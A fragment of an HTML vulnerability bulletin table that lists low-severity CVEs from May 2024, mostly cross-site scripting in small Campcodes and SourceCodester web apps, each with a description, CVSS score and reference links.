<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4721&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4721" target="_blank">CVE-2024-4721</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20xss/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%2044.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263799" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263799" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331887" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Complete Web-Based School Management System<br> </td>
<td>A vulnerability classified as problematic was found in Campcodes Complete Web-Based School Management System 1.0. This vulnerability affects unknown code of the file index.php. The manipulation of the argument category leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263800.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4722&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4722" target="_blank">CVE-2024-4722</a><br><a href="https://github.com/E1CHO/cve_hub/blob/main/Complete%20Web-Based%20School%20Management%20System%20-%20xss/Complete%20Web-Based%20School%20Management%20System%20-%20vuln%2045.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263800" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263800" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331888" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Legal Case Management System<br> </td>
<td>A vulnerability, which was classified as problematic, has been found in Campcodes Legal Case Management System 1.0. This issue affects some unknown processing of the file /admin/case-status. The manipulation of the argument case_status leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263801 was assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4723&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4723" target="_blank">CVE-2024-4723</a><br><a href="https://github.com/yylmm/CVE/blob/main/Legal%20Case%20Management%20System/xss_admin_case-status.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263801" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263801" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331982" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Legal Case Management System<br> </td>
<td>A vulnerability, which was classified as problematic, was found in Campcodes Legal Case Management System 1.0. Affected is an unknown function of the file /admin/case-type. The manipulation of the argument case_type_name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-263802 is the identifier assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4724&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4724" target="_blank">CVE-2024-4724</a><br><a href="https://github.com/yylmm/CVE/blob/main/Legal%20Case%20Management%20System/xss_admin_case-type.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263802" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263802" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331983" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Legal Case Management System<br> </td>
<td>A vulnerability has been found in Campcodes Legal Case Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/client_user. The manipulation of the argument f_name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263803.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4725&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4725" target="_blank">CVE-2024-4725</a><br><a href="https://github.com/yylmm/CVE/blob/main/Legal%20Case%20Management%20System/xss_admin_client_user.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263803" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263803" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331988" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Legal Case Management System<br> </td>
<td>A vulnerability was found in Campcodes Legal Case Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /admin/clients. The manipulation of the argument f_name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263804.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4726&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4726" target="_blank">CVE-2024-4726</a><br><a href="https://github.com/yylmm/CVE/blob/main/Legal%20Case%20Management%20System/xss_admin_clients.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263804" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263804" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331989" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Legal Case Management System<br> </td>
<td>A vulnerability was found in Campcodes Legal Case Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /admin/court-type. The manipulation of the argument court_name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263805 was assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4727&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4727" target="_blank">CVE-2024-4727</a><br><a href="https://github.com/yylmm/CVE/blob/main/Legal%20Case%20Management%20System/xss_admin_court-type.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263805" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263805" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331990" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Legal Case Management System<br> </td>
<td>A vulnerability was found in Campcodes Legal Case Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/court. The manipulation of the argument court_name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-263806 is the identifier assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4728&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4728" target="_blank">CVE-2024-4728</a><br><a href="https://github.com/yylmm/CVE/blob/main/Legal%20Case%20Management%20System/xss_admin_court.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263806" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263806" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331992" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Legal Case Management System<br> </td>
<td>A vulnerability was found in Campcodes Legal Case Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /admin/expense-type. The manipulation of the argument name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263807.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4729&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4729" target="_blank">CVE-2024-4729</a><br><a href="https://github.com/yylmm/CVE/blob/main/Legal%20Case%20Management%20System/xss_admin_expense-type.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263807" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263807" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331993" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Legal Case Management System<br> </td>
<td>A vulnerability classified as problematic has been found in Campcodes Legal Case Management System 1.0. Affected is an unknown function of the file /admin/judge. The manipulation of the argument judge_name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263808.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4730&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4730" target="_blank">CVE-2024-4730</a><br><a href="https://github.com/yylmm/CVE/blob/main/Legal%20Case%20Management%20System/xss_admin_judge.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263808" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263808" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331994" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Legal Case Management System<br> </td>
<td>A vulnerability classified as problematic was found in Campcodes Legal Case Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/role. The manipulation of the argument slug leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263809 was assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4731&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4731" target="_blank">CVE-2024-4731</a><br><a href="https://github.com/yylmm/CVE/blob/main/Legal%20Case%20Management%20System/xss_admin_role.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263809" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263809" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331995" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Legal Case Management System<br> </td>
<td>A vulnerability, which was classified as problematic, has been found in Campcodes Legal Case Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/service. The manipulation of the argument name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-263810 is the identifier assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4732&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4732" target="_blank">CVE-2024-4732</a><br><a href="https://github.com/yylmm/CVE/blob/main/Legal%20Case%20Management%20System/xss_admin_service.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263810" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263810" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331996" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Legal Case Management System<br> </td>
<td>A vulnerability has been found in Campcodes Legal Case Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/tasks. The manipulation of the argument task_subject leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263821 was assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4735&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4735" target="_blank">CVE-2024-4735</a><br><a href="https://github.com/yylmm/CVE/blob/main/Legal%20Case%20Management%20System/xss_admin_tasks.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263821" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263821" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.332408" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Legal Case Management System<br> </td>
<td>A vulnerability was found in Campcodes Legal Case Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /admin/tax. The manipulation of the argument name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-263822 is the identifier assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4736&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4736" target="_blank">CVE-2024-4736</a><br><a href="https://github.com/yylmm/CVE/blob/main/Legal%20Case%20Management%20System/xss_admin_tax.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263822" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263822" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.332409" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Legal Case Management System<br> </td>
<td>A vulnerability was found in Campcodes Legal Case Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /admin/vendor. The manipulation of the argument company_name/mobile leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263823.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4737&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4737" target="_blank">CVE-2024-4737</a><br><a href="https://github.com/yylmm/CVE/blob/main/Legal%20Case%20Management%20System/xss_admin_vendor.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263823" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263823" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.332411" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Legal Case Management System<br> </td>
<td>A vulnerability was found in Campcodes Legal Case Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code. The manipulation of the argument new_client leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263824.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4738&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4738" target="_blank">CVE-2024-4738</a><br><a href="https://github.com/yylmm/CVE/blob/main/Legal%20Case%20Management%20System/xss_admin_appointment.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263824" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263824" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.332412" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Online Laundry Management System<br> </td>
<td>A vulnerability was found in Campcodes Online Laundry Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /ajax.php. The manipulation of the argument name/customer_name/username leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263896.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4797&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4797" target="_blank">CVE-2024-4797</a><br><a href="https://github.com/yylmm/CVE/blob/main/Online%20Laundry%20Management%20System/xss_action.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263896" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263896" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.332539" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Filipe Seabra--WordPress Manuteno<br> </td>
<td>Authentication Bypass by Spoofing vulnerability in Filipe Seabra WordPress ManutenÃ§Ã£o allows Functionality Bypass.This issue affects WordPress ManutenÃ§Ã£o: from n/a through 1.0.6.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-22139&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">3.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-22139" target="_blank">CVE-2024-22139</a><br><a href="https://patchstack.com/database/vulnerability/wp-manutencao/wordpress-wordpress-manutencao-plugin-1-0-6-bypass-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Huawei--HarmonyOS<br> </td>
<td>Insufficient verification vulnerability in the system sharing pop-up module Impact: Successful exploitation of this vulnerability will affect availability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32989&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">3.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32989" target="_blank">CVE-2024-32989</a><br><a href="https://consumer.huawei.com/en/support/bulletin/2024/5/" target="_blank">psirt@huawei.com</a><br><a href="https://device.harmonyos.com/cn/docs/security/update/security-bulletins-phones-202405-0000001902628049" target="_blank">psirt@huawei.com</a></td>
</tr>
<tr>
<td>IBM--Security Guardium<br> </td>
<td>IBM Security Guardium 11.3, 11.4, 11.5, and 12.0 could allow an authenticated user to upload files that would cause a denial of service. IBM X-Force ID: 271526.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-47711&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">2.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-47711" target="_blank">CVE-2023-47711</a><br><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/271526" target="_blank">psirt@us.ibm.com</a><br><a href="https://www.ibm.com/support/pages/node/7150840" target="_blank">psirt@us.ibm.com</a></td>
</tr>
<tr>
<td>JetBrains--TeamCity<br> </td>
<td>In JetBrains TeamCity between 2024.03 and 2024.03.1 several stored XSS in the available updates page were possible</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-35300&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35300" target="_blank">CVE-2024-35300</a><br><a href="https://www.jetbrains.com/privacy-security/issues-fixed/" target="_blank">cve@jetbrains.com</a></td>
</tr>
<tr>
<td>Nozomi Networks--Arc<br> </td>
<td>On Windows systems, the Arc configuration files resulted to be world-readable. This can lead to information disclosure by local attackers, via exfiltration of sensitive data from configuration files.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-5937&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">3.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-5937" target="_blank">CVE-2023-5937</a><br><a href="https://security.nozominetworks.com/NN-2023:15-01" target="_blank">prodsec@nozominetworks.com</a></td>
</tr>
<tr>
<td>OpenText--iManager<br> </td>
<td>Broken Authentication vulnerability discovered in OpenTextâ„¢ iManager 3.2.6.0200. This vulnerability allows an attacker to manipulate certain parameters to bypass authentication.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3487&amp;vector=CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3487" target="_blank">CVE-2024-3487</a><br><a href="https://www.netiq.com/documentation/imanager-32/imanager326_patch3_hf1_releasenotes/data/imanager326_patch3_hf1_releasenotes.html" target="_blank">security@opentext.com</a></td>
</tr>
<tr>
<td>Pippin Williamson--CGC Maintenance Mode<br> </td>
<td>Authentication Bypass by Spoofing vulnerability in Pippin Williamson CGC Maintenance Mode allows Functionality Bypass.This issue affects CGC Maintenance Mode: from n/a through 1.2.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30480&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">3.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30480" target="_blank">CVE-2024-30480</a><br><a href="https://patchstack.com/database/vulnerability/cgc-maintenance-mode/wordpress-cgc-maintenance-mode-plugin-1-2-ip-filtering-bypass-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>SAP_SE--SAP Bank Account Management<br> </td>
<td>SAP Bank Account Management does not perform necessary authorization check for an authorized user, resulting in escalation of privileges. As a result, it has a low impact to confidentiality to the system.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33000&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33000" target="_blank">CVE-2024-33000</a><br><a href="https://me.sap.com/notes/3392049" target="_blank">cna@sap.com</a><br><a href="https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html" target="_blank">cna@sap.com</a></td>
</tr>
<tr>
<td>SAP_SE--SAPUI5 (PDFViewer)<br> </td>
<td>PDFViewer is a control delivered as part of SAPUI5 product which shows the PDF content in an embedded mode by default. If a PDF document contains embedded JavaScript (or any harmful client-side script), the PDFViewer will execute the JavaScript embedded in the PDF which can cause a potential security threat.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33007&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33007" target="_blank">CVE-2024-33007</a><br><a href="https://me.sap.com/notes/3446076" target="_blank">cna@sap.com</a><br><a href="https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html" target="_blank">cna@sap.com</a></td>
</tr>
<tr>
<td>Siemens--Parasolid V35.1<br> </td>
<td>A vulnerability has been identified in Parasolid V35.1 (All versions &lt; V35.1.256), Parasolid V36.0 (All versions &lt; V36.0.208), Parasolid V36.1 (All versions &lt; V36.1.173). The affected applications contain a null pointer dereference vulnerability while parsing specially crafted X_T files. An attacker could leverage this vulnerability to crash the application causing denial of service condition.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32637&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">3.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32637" target="_blank">CVE-2024-32637</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-046364.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--SIMATIC RTLS Locating Manager<br> </td>
<td>A vulnerability has been identified in SIMATIC RTLS Locating Manager (6GT2780-0DA00) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA10) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA20) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA30) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA10) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA20) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA30) (All versions &lt; V3.0.1.1). Affected application contains a hidden configuration item to enable debug functionality. This could allow an authenticated local attacker to gain insight into the internal configuration of the deployment.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33583&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">3.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33583" target="_blank">CVE-2024-33583</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-093430.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>SourceCodester--Interactive Map with Marker<br> </td>
<td>A vulnerability was found in SourceCodester Interactive Map with Marker 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file Marker Name of the component Add Marker. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264536.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4968&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4968" target="_blank">CVE-2024-4968</a><br><a href="https://github.com/BurakSevben/CVEs/blob/main/Interactive%20Map%20App/Interactive%20Map%20App%20-%20Cross-Site-Scripting.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264536" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264536" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.335191" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>SourceCodester--Simple Image Stack Website<br> </td>
<td>A vulnerability, which was classified as problematic, was found in SourceCodester Simple Image Stack Website 1.0. This affects an unknown part. The manipulation of the argument page leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264459.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4922&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">3.5</a></td>
